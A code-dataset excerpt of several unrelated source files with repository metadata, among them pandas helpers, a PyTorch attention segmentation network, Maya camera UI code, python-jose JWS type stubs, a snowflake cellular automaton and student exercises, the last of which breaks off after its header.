| 2015-10-29T21:41:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,936
|
py
|
# -*- coding: utf-8 -*-
"""
@file
@brief Quelques problèmes récurrents avec `pandas <http://pandas.pydata.org/>`_.
"""
def read_csv(filepath_or_buffer, encoding="utf8", sep="\t", **args):
    """Call :func:`pandas.read_csv` with tab-separated, utf-8 defaults.

    When *filepath_or_buffer* is a file name and a utf-8 encoding is
    requested, the function transparently retries with ``utf-8-sig`` if the
    file starts with a byte-order mark (as written e.g. by Windows Notepad),
    so the first column name never carries a stray ``\\ufeff`` character.

    @param      filepath_or_buffer      file name or readable buffer
    @param      encoding                encoding
    @param      sep                     column separator
    @return                             DataFrame
    """
    import pandas
    # Buffers and non-utf8 encodings are passed straight through.
    if not isinstance(filepath_or_buffer, str) or encoding not in ("utf8", "utf-8"):
        return pandas.read_csv(
            filepath_or_buffer, encoding=encoding, sep=sep, **args)
    try:
        df = pandas.read_csv(
            filepath_or_buffer, encoding=encoding, sep=sep, **args)
    except UnicodeError:
        # Not decodable as plain utf-8 (UnicodeDecodeError included):
        # assume a BOM-prefixed file and retry.
        return pandas.read_csv(
            filepath_or_buffer, encoding="utf-8-sig", sep=sep, **args)
    if df.columns[0].startswith("\ufeff"):
        # A BOM leaked into the first column name: re-read, stripping it.
        # (The original implementation raised and caught its own
        # UnicodeError to reach this path; a direct check is clearer.)
        return pandas.read_csv(
            filepath_or_buffer, encoding="utf-8-sig", sep=sep, **args)
    return df
def df_to_clipboard(df, **args):
    """Copy *df* to the clipboard as text, defaulting the separator to a tab.

    Thin wrapper over pandas ``DataFrame.to_clipboard``; a tab separator
    makes the result paste cleanly into an open Excel sheet.

    @param      df      dataframe
    @param      sep     defaults to ``\\t`` unless explicitly overridden
    """
    args.setdefault("sep", "\t")
    df.to_clipboard(**args)
def df_equal(df1, df2):
    """Tell whether two dataframes hold the same columns, dtypes and values.

    Column order is ignored: both frames are re-indexed by their sorted
    column names before comparing. Dtypes must match column by column.

    @param      df1     first dataframe
    @param      df2     second dataframe
    @return             boolean

    NaN values are not handled well because ``numpy.nan != numpy.nan``;
    for richer comparisons see ``pandas.util.testing.assert_frame_equal``.
    """
    if df1.shape != df2.shape:
        return False
    cols1 = sorted(df1.columns)
    cols2 = sorted(df2.columns)
    if cols1 != cols2:
        return False
    left = df1[cols1]
    right = df2[cols2]
    # dtypes first: a value-equal int/float pair still counts as different
    if False in set(left.dtypes == right.dtypes):
        return False
    return False not in set((left == right).all())
def groupby_topn(df, by_keys, sort_keys, ascending=True, n=1, as_index=True):
    """Take the top *n* rows per group.

    Groups rows by *by_keys*, sorts each group by *sort_keys* and keeps the
    first *n* rows of every group.

    @param      df          dataframe
    @param      by_keys     rows will be grouped by these columns
    @param      sort_keys   rows will be sorted by these columns
    @param      ascending   parameter passed to the sort
    @param      n           n in top *n*
    @param      as_index    if False, drop the group index from the result
    @return                 result

    .. note::
        The original implementation called ``DataFrame.sort``, which was
        deprecated in pandas 0.17 and removed in 0.20; ``sort_values`` is
        its direct replacement with identical semantics here.
    """
    res = df.groupby(by_keys).apply(
        lambda x: x.sort_values(sort_keys, ascending=ascending).head(n))
    if not as_index:
        # flatten the (group, row) MultiIndex back to a plain range index
        res = res.reset_index(drop=True)
    return res
|
[
"xavier.dupre@ensae.fr"
] |
xavier.dupre@ensae.fr
|
1a7add79983d9aaaa4ac9d383db387f438a20b30
|
3abe14e934f775aca6dba588a9da5c908808daec
|
/setuptools/tests/test_depends.py
|
e0cfa88049d7ab7e93b8af06cdac45ee96c0714d
|
[
"MIT"
] |
permissive
|
IronLanguages/setuptools
|
e1d6d6aaf990a2691f79ce3a4ca21b87e2f10a1a
|
20aa9400b3d44df952c362217d3c5a1c3988467f
|
refs/heads/master
| 2020-03-19T04:21:15.955081
| 2018-06-02T13:26:55
| 2018-06-02T13:26:55
| 135,819,098
| 2
| 1
|
MIT
| 2018-06-02T13:17:01
| 2018-06-02T13:17:01
| null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
import sys
from setuptools import depends
class TestGetModuleConstant:
    """Tests for setuptools.depends.get_module_constant."""

    def test_basic(self):
        """
        Invoke get_module_constant on a module in
        the test package.
        """
        mod_name = 'setuptools.tests.mod_with_constant'
        val = depends.get_module_constant(mod_name, 'value')
        assert val == 'three, sir!'
        # extracting the constant must not leave the module imported
        assert 'setuptools.tests.mod_with_constant' not in sys.modules
|
[
"jaraco@jaraco.com"
] |
jaraco@jaraco.com
|
c03e87ec7816e07b685894a92fa3274d5414db6c
|
e80393d0e32358d68e60b5119406c654d2373e1f
|
/encoding/models/aca2.py
|
83cbbae9f07d7dbe332b8679537ef97e0f8d8c86
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
yougoforward/Fast_psaa
|
3e333fb31743bda7684cc0bdae378bf40d839f63
|
68e99cd5bcf3bf5ab45ea604c3898fabc458c020
|
refs/heads/master
| 2022-11-04T02:01:03.694010
| 2019-11-30T07:53:01
| 2019-11-30T07:53:01
| 224,800,023
| 1
| 1
|
NOASSERTION
| 2022-10-26T23:53:43
| 2019-11-29T07:27:43
|
Python
|
UTF-8
|
Python
| false
| false
| 7,162
|
py
|
from __future__ import division
import torch
import torch.nn as nn
import torch.nn.functional as F
from .mask_softmax import Mask_Softmax
from .fcn import FCNHead
from .base import BaseNet
__all__ = ['ACA2Net', 'get_aca2net']
class ACA2Net(BaseNet):
    """Segmentation network with a dual guided-SE-CAM attention head.

    The backbone/feature extraction comes from BaseNet; when ``aux`` is
    True an FCN auxiliary head over the stage-3 features is added and its
    prediction appended to the output tuple.
    """

    def __init__(self, nclass, backbone, aux=True, se_loss=False, norm_layer=nn.BatchNorm2d, **kwargs):
        super(ACA2Net, self).__init__(nclass, backbone, aux, se_loss, norm_layer=norm_layer, **kwargs)
        # 2048/1024 channel counts match the last two backbone stages
        self.head = ACA2NetHead(2048, nclass, norm_layer, se_loss, jpu=kwargs['jpu'], up_kwargs=self._up_kwargs)
        if aux:
            self.auxlayer = FCNHead(1024, nclass, norm_layer)

    def forward(self, x):
        _, _, h, w = x.size()
        # base_forward yields four backbone stages; only c3 and c4 are used
        _, _, c3, c4 = self.base_forward(x)

        x = list(self.head(c4))
        # upsample the main prediction back to the input resolution
        x[0] = F.interpolate(x[0], (h, w), **self._up_kwargs)
        if self.aux:
            auxout = self.auxlayer(c3)
            auxout = F.interpolate(auxout, (h, w), **self._up_kwargs)
            x.append(auxout)
        return tuple(x)
class ACA2NetHead(nn.Module):
    """Head running two parallel guided-SE-CAM branches and summing them.

    With ``se_loss`` the fused features are additionally pooled globally,
    passed through a sigmoid gate that re-weights them before the final
    classifier, and a per-class prediction from the pooled vector is
    returned as a second output.
    """

    def __init__(self, in_channels, out_channels, norm_layer, se_loss, jpu=False, up_kwargs=None,
                 atrous_rates=(12, 24, 36)):
        super(ACA2NetHead, self).__init__()
        self.se_loss = se_loss
        # standard 4x channel reduction for the head
        inter_channels = in_channels // 4
        # self.conv5c = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
        #                            norm_layer(inter_channels),
        #                            nn.ReLU(inplace=True))
        self.sec = guided_SE_CAM_Module(in_channels, inter_channels, norm_layer)
        self.conv5e = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 1, padding=0, bias=False),
                                    norm_layer(inter_channels), nn.ReLU(True))

        # self.conv5c2 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 3, padding=1, bias=False),
        #                             norm_layer(inter_channels),
        #                             nn.ReLU(inplace=True))
        # second, independently parameterized branch over the same input
        self.sec2 = guided_SE_CAM_Module(in_channels, inter_channels, norm_layer)
        self.conv5e2 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 1, padding=0, bias=False),
                                     norm_layer(inter_channels), nn.ReLU(True))

        self.conv8 = nn.Sequential(nn.Dropout2d(0.1), nn.Conv2d(512, out_channels, 1))

        self.gap = nn.AdaptiveAvgPool2d(1)
        self.fc = nn.Sequential(
            nn.Conv2d(inter_channels, inter_channels, 1),
            nn.Sigmoid())
        if self.se_loss:
            self.selayer = nn.Linear(inter_channels, out_channels)

    def forward(self, x):
        # branch 1
        # feat = self.conv5c(x)
        sec_feat = self.sec(x)
        sec_feat = self.conv5e(sec_feat)

        # branch 2 (same structure, separate weights)
        # feat2 = self.conv5c2(x)
        sec_feat2 = self.sec2(x)
        sec_feat2 = self.conv5e2(sec_feat2)

        feat_sum = sec_feat + sec_feat2
        if self.se_loss:
            gap_feat = self.gap(feat_sum)
            # sigmoid gate re-weights the fused features channel-wise
            gamma = self.fc(gap_feat)
            outputs = [self.conv8(F.relu_(feat_sum + feat_sum * gamma))]
            # auxiliary per-class presence prediction from the pooled vector
            outputs.append(self.selayer(torch.squeeze(gap_feat)))
        else:
            outputs = [self.conv8(feat_sum)]
        return tuple(outputs)
def get_aca2net(dataset='pascal_voc', backbone='resnet50', pretrained=False,
                root='~/.encoding/models', **kwargs):
    """Construct an ACA2Net sized for *dataset*'s class count.

    @param dataset     dataset key used to infer the number of classes
    @param backbone    backbone network name
    @param pretrained  loading pretrained weights is not implemented yet
    @param root        model-zoo cache directory
    """
    # infer number of classes
    from ..datasets import datasets
    model = ACA2Net(datasets[dataset.lower()].NUM_CLASS, backbone=backbone, root=root, **kwargs)
    if pretrained:
        raise NotImplementedError

    return model
class guided_CAM_Module(nn.Module):
    """Channel attention with learned query/key/value projections.

    Unlike the classic CAM, all three projections are 1x1 conv + BN + ReLU
    from ``in_dim`` down to ``out_dim`` channels; attention is computed
    between the projected channels. The attended output is blended into
    the value projection through a learned scalar ``gamma`` (initialized
    to 0, i.e. the module starts as the plain value projection).
    """
    # Ref from SAGAN
    def __init__(self, in_dim, out_dim):
        super(guided_CAM_Module, self).__init__()
        self.chanel_in = in_dim
        self.chanel_out = out_dim

        self.query_conv = nn.Sequential(
            nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
            nn.ReLU())
        self.key_conv = nn.Sequential(
            nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
            nn.ReLU())
        self.value_conv = nn.Sequential(
            nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
            nn.ReLU())

        self.gamma = nn.Parameter(torch.zeros(1))
        self.softmax = nn.Softmax(dim=-1)

    def forward(self,x):
        """
        inputs :
            x : input feature maps( B X C X H X W)
        returns :
            out : attention value + input feature
            attention: B X C X C
        """
        m_batchsize, C, height, width = x.size()
        proj_query = self.query_conv(x).view(m_batchsize, self.chanel_out, -1)
        proj_key = self.key_conv(x).view(m_batchsize, self.chanel_out, -1).permute(0, 2, 1)
        # channel-by-channel similarity: (B, out, out)
        energy = torch.bmm(proj_query, proj_key)
        # subtract each row's max (as in DANet's CAM) before the softmax —
        # note this also inverts the ordering of the scores
        energy_new = torch.max(energy, -1, keepdim=True)[0].expand_as(energy)-energy
        attention = self.softmax(energy_new)
        proj_value = self.value_conv(x)

        out = torch.bmm(attention, proj_value.view(m_batchsize, self.chanel_out, -1))
        out = out.view(m_batchsize, self.chanel_out, height, width)

        # residual blend; gamma starts at 0 so training begins at identity
        out = self.gamma*out + proj_value
        return out
class SE_Module(nn.Module):
""" Channel attention module"""
def __init__(self, in_dim, out_dim):
super(SE_Module, self).__init__()
self.se = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),
nn.Conv2d(in_dim, in_dim // 16, kernel_size=1, padding=0, dilation=1,
bias=True),
nn.ReLU(),
nn.Conv2d(in_dim // 16, out_dim, kernel_size=1, padding=0, dilation=1,
bias=True),
nn.Sigmoid()
)
def forward(self, x):
out = self.se(x)
return out
class guided_SE_CAM_Module(nn.Module):
    """Fuse a guided channel-attention branch with an SE-gated projection.

    Output is relu((se(x) * proj(x) + proj(x)) + guided_cam(x)), mapping
    ``in_dim`` channels down to ``out_dim``.
    """

    def __init__(self, in_dim, out_dim, norm_layer):
        super(guided_SE_CAM_Module, self).__init__()
        self.guided_cam = guided_CAM_Module(in_dim, out_dim)
        self.project = nn.Sequential(
            nn.Conv2d(in_dim, out_dim, kernel_size=1, padding=0, dilation=1, bias=False),
            norm_layer(out_dim), nn.ReLU(True),
        )
        self.se = SE_Module(in_dim, out_dim)
        self.relu = nn.ReLU()

    def forward(self, x):
        """Return the fused attention features for (B, in_dim, H, W) input."""
        cam_branch = self.guided_cam(x)
        projected = self.project(x)
        gate = self.se(x)
        # SE gating with a residual on the plain projection
        gated = gate * projected + projected
        return self.relu(gated + cam_branch)
|
[
"908865817@qq.com"
] |
908865817@qq.com
|
3c145b8ef4e538afdc8b05b7dc35000c6cd14bde
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/429/usersdata/321/107581/submittedfiles/jogoDaVelha.py
|
b5f5699b08831f08b81685112bfe8cf9f27f5873
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 962
|
py
|
# -*- coding: utf-8 -*-
from jogoDaVelha_BIB import *
# Main tic-tac-toe program (original comment: "put your program from here on").
print('Bem vindo ao JogoDaVelha do grupo 8 [Iara, Ingrid, Luiz Otávio, Tatiane]\n')
a=nome()
b=solicitaSimboloDoHumano()
sort=sorteioPrimeiraJogada(a)
# sort == 0 -> the computer plays first; otherwise the human starts.
# The computer always takes the symbol the human did not pick.
if sort==0:
    if b == 'X':
        c = ' O '
    else:
        c = ' X '
    JogadaComputador(c)
    mostrarTabuleiro()
    p=JogadaHumana(a,b)
else:
    if b == 'X':
        c = ' O '
    else:
        c = ' X '
    p=JogadaHumana(a,b)
    JogadaComputador(c)
    mostrarTabuleiro()
# Alternate turns until verificaVencedor reports a winner.
while not verificaVencedor(b,tabuleiro,a):
    if sort==0:
        if JogadaComputador(c):
            mostrarTabuleiro()
        JogadaHumana(a,b)
        mostrarTabuleiro()
    else:
        if JogadaHumana(a,b):
            if JogadaComputador(c):
                mostrarTabuleiro()
    #if not jogueNovamente():
        #break
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
af8822c01c2eae258d213fcd4fb4dabd0f0f483b
|
9a9e0398f26cee9864d48c4618c0a482e5475e83
|
/Python/code/design_browser_history.py
|
21040767673ace8a3036f93a95df6462006bd225
|
[] |
no_license
|
CNife/leetcode
|
92693c653bb41780ee431293286c3e909009e9b0
|
7cdd61692ecb52dd1613169e80b924dd39d35996
|
refs/heads/main
| 2021-06-22T21:22:12.997253
| 2021-03-18T07:07:15
| 2021-03-18T07:07:15
| 206,955,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,124
|
py
|
from typing import List
class BrowserHistory:
    """Browser history with back/forward navigation (LeetCode 1472).

    Pages live in a list; ``pointer`` indexes the page currently shown.
    Visiting a page discards any forward history past the pointer.
    """

    def __init__(self, homepage: str):
        self.stack: List[str] = [homepage]
        self.pointer: int = 0

    def visit(self, url: str) -> None:
        """Open *url*, dropping everything forward of the current page."""
        del self.stack[self.pointer + 1 :]
        self.stack.append(url)
        self.pointer += 1

    def back(self, steps: int) -> str:
        """Move up to *steps* pages back; clamps at the first page."""
        self.pointer = max(self.pointer - steps, 0)
        return self.stack[self.pointer]

    def forward(self, steps: int) -> str:
        """Move up to *steps* pages forward; clamps at the last page."""
        self.pointer = min(self.pointer + steps, len(self.stack) - 1)
        return self.stack[self.pointer]
# Smoke test executed at import time, mirroring the LeetCode example.
b = BrowserHistory("leetcode.com")
b.visit("google.com")
b.visit("facebook.com")
b.visit("youtube.com")
assert b.back(1) == "facebook.com"
assert b.back(1) == "google.com"
assert b.forward(1) == "facebook.com"
# visiting here must discard the forward entry ("youtube.com")
b.visit("linkedin.com")
assert b.forward(2) == "linkedin.com"
assert b.back(2) == "google.com"
# stepping back past the start clamps at the homepage
assert b.back(7) == "leetcode.com"
|
[
"CNife@vip.qq.com"
] |
CNife@vip.qq.com
|
8f531582e923fb0fb0831e88beb903ecdecbc8a3
|
b521802cca8e4ee4ff5a5ffe59175a34f2f6d763
|
/maya/maya-utils/Scripts/Animation/2019-2-15 Tim Cam_Route_Manager/.history/Cam_Main/Cam_Main/Cam_Item_Layout_20190119190257.py
|
89fe9b62ef2019192a357e1a4849c612a4a637d1
|
[] |
no_license
|
all-in-one-of/I-Do-library
|
2edf68b29558728ce53fe17168694ad0353a076e
|
8972ebdcf1430ccc207028d8482210092acf02ce
|
refs/heads/master
| 2021-01-04T06:58:57.871216
| 2019-12-16T04:52:20
| 2019-12-16T04:52:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,985
|
py
|
# -*- coding:utf-8 -*-
# Require Header
import os
import json
from functools import partial
# Sys Header
import sys
import traceback
import subprocess
import plugin.Qt as Qt
from Qt.QtCore import *
from Qt.QtGui import *
from Qt.QtWidgets import *
def loadUiType(uiFile):
    """Return (form_class, base_class) for a Qt Designer .ui file.

    PyQt ships a loadUiType; for PySide/PySide2 the .ui file is compiled to
    Python source in memory, executed, and the generated Ui_* class plus its
    Qt widget base class are extracted from the compiled namespace.

    NOTE: `exec pyc in frame` below is Python-2-only syntax — this module
    cannot run under Python 3 as written.
    """
    import plugin.Qt as Qt
    if Qt.__binding__.startswith('PyQt'):
        from Qt import _uic as uic
        return uic.loadUiType(uiFile)
    elif Qt.__binding__ == 'PySide':
        import pysideuic as uic
    else:
        import pyside2uic as uic

    import xml.etree.ElementTree as xml
    from cStringIO import StringIO

    # the .ui XML names both the generated class and its widget base class
    parsed = xml.parse(uiFile)
    widget_class = parsed.find('widget').get('class')
    form_class = parsed.find('class').text

    with open(uiFile, 'r') as f:
        o = StringIO()
        frame = {}

        uic.compileUi(f, o, indent=0)
        pyc = compile(o.getvalue(), '<string>', 'exec')
        exec pyc in frame

        # Fetch the base_class and form class based on their type
        # in the xml from designer
        form_class = frame['Ui_%s'%form_class]
        base_class = eval('%s'%widget_class)
    return form_class, base_class
from Qt.QtCompat import wrapInstance
DIR = os.path.dirname(__file__)
UI_PATH = os.path.join(DIR,"ui","Cam_Item_Layout.ui")
GUI_STATE_PATH = os.path.join(DIR, "json" ,'GUI_STATE.json')
form_class , base_class = loadUiType(UI_PATH)
from maya import cmds
class Cam_Item_Layout(form_class,base_class):
    """Scrollable container widget that manages a list of Cam_Item rows."""

    def __init__(self,MainWindow):
        super(Cam_Item_Layout,self).__init__()
        self.setupUi(self)
        self.MainWindow = MainWindow
        self.Item_Add_BTN.clicked.connect(self.Item_Add_Fn)
        self.Item_Clear_BTN.clicked.connect(self.Item_Clear_Fn)
        # Running counter used to give every new Cam_Item a unique name.
        self.Cam_Item_Num = 0
        self.Cam_Item_Scroll.verticalScrollBar().valueChanged.connect(self.Scroll_Fn)
        self.Scroll_Offset = 0
        # Per-layout attributes persisted to JSON by the main window.
        self.Attr = {}
        self.Attr["Add_Crv_LE"] = ""
        self.Attr["Add_Motion_Path_LE"] = ""
        self.Attr["Add_CamGrp_LE"] = ""
        self.Attr["Add_Loc_LE"] = ""
        self.Attr["Name"] = ""
        # NOTE: action buttons (translated from Chinese comment)
        self.Batch_Keyframe_BTN.clicked.connect(self.Batch_Keyframe_Fn)
        self.Select_Path_BTN.clicked.connect(self.Select_Path_Fn)

    def Batch_Keyframe_Fn(self):
        """Shift each child's motion-path keys so its curve starts at frame 0."""
        ChildrenList = self.Item_Layout.children()
        for i,child in enumerate(ChildrenList):
            if i != 0:  # index 0 is the layout object itself, not an item
                Path = child.Attr["Add_Motion_Path_LE"]
                if cmds.objExists(Path):
                    offset = cmds.keyframe(Path,q=1)[0]
                    cmds.keyframe("%s.uValue"% Path,e=1,iub=1,r=1,o="over",tc=-offset)

    def Select_Path_Fn(self):
        """Select every existing motion-path node referenced by the children."""
        cmds.select(cl=1)
        ChildrenList = self.Item_Layout.children()
        for i,child in enumerate(ChildrenList):
            if i != 0:
                if cmds.objExists(child.Attr["Add_Motion_Path_LE"]):
                    cmds.select(child.Attr["Add_Motion_Path_LE"],add=1)

    def Item_Add_Fn(self):
        """Create, register and return a new Cam_Item."""
        self.Cam_Item_Num += 1
        return Cam_Item(self,self.MainWindow)

    def Item_Clear_Fn(self):
        """Reset the stored attributes and delete every child Cam_Item."""
        self.Attr["Add_Crv_LE"] = ""
        self.Attr["Add_Motion_Path_LE"] = ""
        self.Attr["Name"] = ""
        for i,child in enumerate(self.Item_Layout.children()):
            if i != 0:
                child.deleteLater()

    def Scroll_Fn(self):
        """Remember the current vertical scroll position."""
        self.Scroll_Offset = self.Cam_Item_Scroll.verticalScrollBar().value()
UI_PATH = os.path.join(DIR,"ui","Cam_Item.ui")
form_class , base_class = loadUiType(UI_PATH)
class Cam_Item(form_class,base_class):
    """One camera entry row; inserts itself into the parent Cam_Item_Layout."""

    def __init__(self,parent,MainWindow):
        super(Cam_Item,self).__init__()
        self.setupUi(self)
        self.MainWindow = MainWindow
        self.Cam_Del_BTN.clicked.connect(self.Cam_Del_BTN_Fn)
        self.Cam_Con_CB.stateChanged.connect(self.Cam_Con_CB_Fn)
        # NOTE: initialise creation parameters (translated from Chinese comment)
        TotalCount = len(parent.Item_Layout.children())
        parent.Item_Layout.layout().insertWidget(TotalCount-1,self)
        self.Cam_LE.setText("Cam_Item_%s" % parent.Cam_Item_Num)
        self.Cam_Num_Label.setText(u"镜头%s" % TotalCount)
        self.setObjectName("Cam_Item_%s" % TotalCount)
        self.Num = TotalCount
        self.Attr = {}
        self.Attr["Add_CamGrp_LE"] = ""
        self.Attr["Add_Loc_LE"] = ""
        self.Attr["Add_Crv_LE"] = ""
        self.Attr["Add_Motion_Path_LE"] = ""
        self.Attr["Strat_Time_SB"] = 0
        self.Attr["End_Time_SB"] = 0
        self.MainWindow.Save_Json_Fun()

    def Cam_Del_BTN_Fn(self):
        """Delete this item, renumber the remaining siblings, persist state."""
        self.deleteLater()
        ChildrenList = self.parent().children()
        for i,child in enumerate(ChildrenList):
            if i != 0:  # index 0 is the layout object itself, not an item
                if i > self.Num:
                    # NOTE: fix up the index of later children (translated)
                    child.Num -= 1
                    child.Cam_Num_Label.setText(u"镜头%s" % (i-1))
                    child.setObjectName("Cam_Item_%s" % (i-1))
                else:
                    child.Cam_Num_Label.setText(u"镜头%s" % i)
                    child.setObjectName("Cam_Item_%s" % i)
        self.Attr["Add_CamGrp_LE"] = ""
        self.Attr["Add_Loc_LE"] = ""
        self.Attr["Add_Crv_LE"] = ""
        self.Attr["Add_Motion_Path_LE"] = ""
        self.Attr["Strat_Time_SB"] = ""
        self.Attr["End_Time_SB"] = ""
        self.MainWindow.Save_Json_Fun()

    def Cam_Con_CB_Fn(self,state):
        """Keep the 'control' checkbox exclusive among sibling items.

        BUGFIX: the original was missing the colon after ``else``, which made
        the whole module unimportable (SyntaxError).  No other change.
        """
        ChildrenList = self.parent().children()
        for i,child in enumerate(ChildrenList):
            if i != 0:
                if child != self:
                    child.Cam_Con_CB.blockSignals(True)
                    child.Cam_Con_CB.setChecked(False)
        if state == 0:
            self.Cam_Con_CB.setChecked(True)
        else:
            for i,child in enumerate(ChildrenList):
                if i != 0:
                    if child != self:
                        child.Cam_Con_CB.blockSignals(False)
|
[
"2595715768@qq.com"
] |
2595715768@qq.com
|
ab8798f43f4e62010d729812993d84aa181dc52b
|
14373275670c1f3065ce9ae195df142146e2c1a4
|
/stubs/python-jose/jose/jws.pyi
|
777770ae62ba7928c9ecd32abfe7fdcce15fb17d
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
sobolevn/typeshed
|
eb7af17c06a9722f23c337e6b9a4726223155d58
|
d63a82640390a9c130e0fe7d409e8b0b836b7c31
|
refs/heads/master
| 2023-08-04T05:59:29.447015
| 2023-06-14T21:27:53
| 2023-06-14T21:27:53
| 216,265,622
| 2
| 0
|
Apache-2.0
| 2022-02-08T10:40:53
| 2019-10-19T20:21:25
|
Python
|
UTF-8
|
Python
| false
| false
| 939
|
pyi
|
from collections.abc import Container, Mapping
from typing import Any
from .backends.base import Key
def sign(
    payload: bytes | Mapping[str, Any],
    # Internally it's passed down to jwk.construct(), which explicitly checks for
    # key as dict instance, instead of a Mapping
    key: str | bytes | dict[str, Any] | Key,
    headers: Mapping[str, Any] | None = None,
    algorithm: str = "HS256",
) -> str: ...
def verify(
    token: str | bytes,
    key: str | bytes | Mapping[str, Any] | Key,
    # Callers of this function, like jwt.decode(), and functions called internally,
    # like jws._verify_signature(), use and accept algorithms=None
    algorithms: str | Container[str] | None,
    verify: bool = True,
) -> bytes: ...
# The get_unverified_* helpers decode parts of the token WITHOUT verifying
# the signature; their results must not be trusted for authorization.
def get_unverified_header(token: str | bytes) -> dict[str, Any]: ...
def get_unverified_headers(token: str | bytes) -> dict[str, Any]: ...
def get_unverified_claims(token: str | bytes) -> bytes: ...
|
[
"noreply@github.com"
] |
sobolevn.noreply@github.com
|
83dee180bba344ba4431b5eddabacca981be46a9
|
ea378480ba678eb123ef826e3ca0c3eb8f4e538f
|
/py ref/agg:PIL/05-snowflake.py
|
685698ad5cd2aee1ad26a0569fba738e94d596b8
|
[] |
no_license
|
msarch/py
|
67235643666b1ed762d418263f7eed3966d3f522
|
dcd25e633a87cdb3710e90224e5387d3516c1cd3
|
refs/heads/master
| 2021-01-01T05:21:58.175043
| 2017-05-25T08:15:26
| 2017-05-25T08:15:26
| 87,453,820
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,443
|
py
|
# Snowflake Simulation Using Reiter Cellular Automata
# Source: "A Local Cellular Model for Snow Crystal Growth" by Cliff Reiter
# FB36 - 20130107
import math
import random
from PIL import Image, ImageDraw
imgx = 500; imgy = 500 # image size
imgx1 = imgx - 1; imgy1 = imgy - 1
image = Image.new("RGB", (imgx, imgy))
draw = ImageDraw.Draw(image)
pixels = image.load()
maxIt = 10 # of growth steps
# snowflake will differ depending on values of these parameters:
alpha = random.random() * 1.5 + 0.5
beta = random.random() * 0.3 + 0.3
gamma = random.random() * 0.01
mx = 250; my = 250 # width and height of 2DCA
ca = [[beta for x in range(mx)] for y in range(my)]
caRep = [[beta for x in range(mx)] for y in range(my)] # receptive cells
caNRep = [[beta for x in range(mx)] for y in range(my)] # non-receptive cells
dx = [-1, 0, -1, 1, 0, 1]; dy = [-1, -1, 0, 0, 1, 1] # 6 directions to grow
# these are for coloring the image
while True:
mr0 = 2 ** random.randint(3, 6); mr1 = 256 / mr0
mg0 = 2 ** random.randint(3, 6); mg1 = 256 / mg0
mb0 = 2 ** random.randint(3, 6); mb1 = 256 / mb0
if mr0 != mg0 and mr0 != mb0 and mg0 != mb0: break
ca[(my - 1) / 2][(mx - 1) / 2] = 1.0 # ice seed
for i in range(maxIt): # growth steps
print "Growth Step: " + str(i + 1) + " of " + str(maxIt)
# separate the array into receptive and non-receptive arrays
for iy in range(my):
for ix in range(mx):
receptive = False
if ca[iy][ix] >= 1.0: # ice
receptive = True
else: # check neighbors
for j in range(6):
jx = ix + dx[j]; jy = iy + dy[j]
if jx >= 0 and jx < mx and jy >= 0 and jy < my:
if ca[jy][jx] >= 1.0: # ice
receptive = True
break
if receptive:
caRep[iy][ix] = ca[iy][ix] + gamma
caNRep[iy][ix] = 0.0
else:
caRep[iy][ix] = 0.0
caNRep[iy][ix] = ca[iy][ix]
# new array: weighed averages of the non-receptive array + receptive array
for iy in range(my):
for ix in range(mx):
wsum = caNRep[iy][ix] * (1.0 - alpha * 6.0 / 12.0)
for j in range(6): # neighbors
jx = ix + dx[j]; jy = iy + dy[j]
if jx >= 0 and jx < mx and jy >= 0 and jy < my:
wsum += caNRep[jy][jx] * alpha / 12.0
ca[iy][ix] = caRep[iy][ix] + wsum
# paint final state of the snowflake
an45 = - math.pi / 4.0
sn45 = math.sin(an45); cs45 = math.cos(an45)
scale = math.sqrt(3.0); ox = imgx1 / 2.0; oy = imgy1 / 2.0
for ky in range(imgy):
for kx in range(imgx):
# apply geometric transformation (scaling and rotation)
print ky,kx
tx = kx - ox; ty = (ky - oy) * scale
tx0 = tx * cs45 - ty * sn45 + ox
ty = tx * sn45 + ty * cs45 + oy; tx = tx0
if tx >= 0 and tx <= imgx1 and ty >= 0 and ty <= imgy1:
c = ca[int((my - 1) * ty / imgy1)][int((mx - 1) * tx / imgx1)]
if c >= 1.0: # ice
c = int((c - 1.0) * 255)
pixels[kx, ky] = (c % mr0 * mr1, c % mg0 * mg1, c % mb0 * mb1)
label = "alpha = " + str(alpha) + " beta = " + str(beta) + " gamma = " + str(gamma)
draw.text((0, 0), label, (0, 255, 0)) # write to top-left using green color
image.save("Snowflake.png", "PNG")
print "done"
|
[
"msarch@free.fr"
] |
msarch@free.fr
|
c26ce4af3e3326663a505c3563633472e49af3ec
|
f87f51ec4d9353bc3836e22ac4a944951f9c45c0
|
/.history/HW06_20210715232125.py
|
82e83460b2b3572ef7ede77011ce58249bbfcda0
|
[] |
no_license
|
sanjayMamidipaka/cs1301
|
deaffee3847519eb85030d1bd82ae11e734bc1b7
|
9ddb66596497382d807673eba96853a17884d67b
|
refs/heads/main
| 2023-06-25T04:52:28.153535
| 2021-07-26T16:42:44
| 2021-07-26T16:42:44
| 389,703,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,842
|
py
|
"""
Georgia Institute of Technology - CS1301
HW06 - Text Files & CSV
Collaboration Statement:
"""
#########################################
"""
